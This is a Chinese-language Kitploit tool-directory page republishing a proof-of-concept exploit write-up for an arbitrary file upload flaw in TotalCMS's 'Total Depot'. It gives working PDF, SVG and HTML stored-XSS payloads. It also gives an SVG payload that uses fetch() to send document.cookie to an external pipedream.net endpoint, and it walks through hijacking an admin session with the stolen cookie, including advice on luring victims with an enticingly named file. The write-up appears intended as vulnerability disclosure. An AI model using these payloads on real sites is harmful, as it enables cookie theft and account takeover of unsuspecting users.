Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot — TotalCMS 受任意文件上传 - XSS 漏洞影响,该漏洞允许存储型跨站脚本(XSS)攻击,并窃取会话 Cookie。 | Kitploit
工具/GitHubGitHub/sromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用数据泄露学习与教育
GitHubsromanhu/totalcms-arbitrary_file-upload--xss_steal_cookies---totaldepot

TotalCMS-Arbitrary_File-Upload--XSS_Steal_Cookies---TotalDepot

TotalCMS 受任意文件上传 - XSS 漏洞影响,该漏洞允许存储型跨站脚本(XSS)攻击,并窃取会话 Cookie。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
2年前尚未审核

TotalCMS 任意文件上传 - XSS 与窃取 Cookie

作者:(Sergio)

描述: TotalCMS 受到任意文件上传 - XSS 漏洞的影响,该漏洞允许跨站脚本(XSS)以及窃取会话 Cookie。

攻击向量: “Total Depot” 文件上传过滤机制中的漏洞允许你上传带有隐藏 alert 的 PDF / SVG / HTML 文件以触发跨站脚本(XSS),并窃取用户 Cookie。


我将进行 2 个 PoC:

- POC 1:PDF / SVG 和 HTML 文件的跨站脚本(XSS)

- POC 2:窃取用户 Cookie 并将其转发到外部服务器以截获它们并冒充用户。

我们从第一个 PoC 开始:

POC 1:PDF / SVG 和 HTML 文件的跨站脚本(XSS)

登录管理面板 (https://www.totalcms.co/demo/total-cms/admin/) 后,我们将进入管理站点的“Total Depot”,并上传包含隐藏 XSS 的 PDF / SVG / 和 HTML 文件。

以下是载荷:

XSS PDF 载荷:

该载荷是使用 JS2PDFInjector 工具生成的 XSS 载荷,以及一个包含以下内容的 js 载荷:

root@kitploit:~
app.alert("XSS");

SVG 载荷:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
</svg>

HTML 载荷:

root@kitploit:~
<html>
	<script>
		alert(document.cookie);
	</script>
</html>

image

image

上传后,如果我们点击链接,就可以看到它们存储的路径:

image

文件路径:

image

image

image

下面就是这 3 类文件以及用户 Cookie 触发跨站脚本(XSS)的结果:

image

image

image

我们继续第二个 PoC:

- POC 2:窃取用户 Cookie 并将其转发到外部服务器以截获它们并冒充用户。

我们将假扮成网络犯罪分子,窃取用户的会话 Cookie,并将它们发送到服务器。

在本例中,我上传了一个文件作为 PoC,但在实际场景中,我们可以上传一个名称诱人的文件,例如“NBA Tickets”,并发布它,这样受害用户在执行该文件时就会在毫无察觉的情况下把 Cookie 发送给我。


首先,我们进行一次测试,看看我们是否与外部服务器建立了通信。

以下是载荷:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://enbjn0l9vbowi.x.pipedream.net/" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>

image

image

正如我们在 pipedream Request 中看到的,我们已正确获取到该请求。


我们修改载荷以窃取 Cookie,并将其发送到 pipedream Request,这样我们就可以冒充用户。

以下是载荷:

root@kitploit:~
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script>
  fetch('https://enbjn0l9vbowi.x.pipedream.net/', {
  method: 'POST',
  mode: 'no-cors',
  body: document.cookie
  });
</script>   
</svg>

我们执行它:


image

image

正如我们在图片中看到的,我们已成功获取用户的会话 Cookie。


现在我们将冒充用户。为了测试,我们在另一个浏览器中打开 TotalCMS/admin 的会话,并打开“Cookie Editor”附加组件。

image

我们将会话 Cookie 修改为在 pipestream 中获取到的那一个并保存。

image

我们重新加载了网站,并成功冒充了管理员用户。

image


附加信息:

https://www.totalcms.co/

https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

下载工具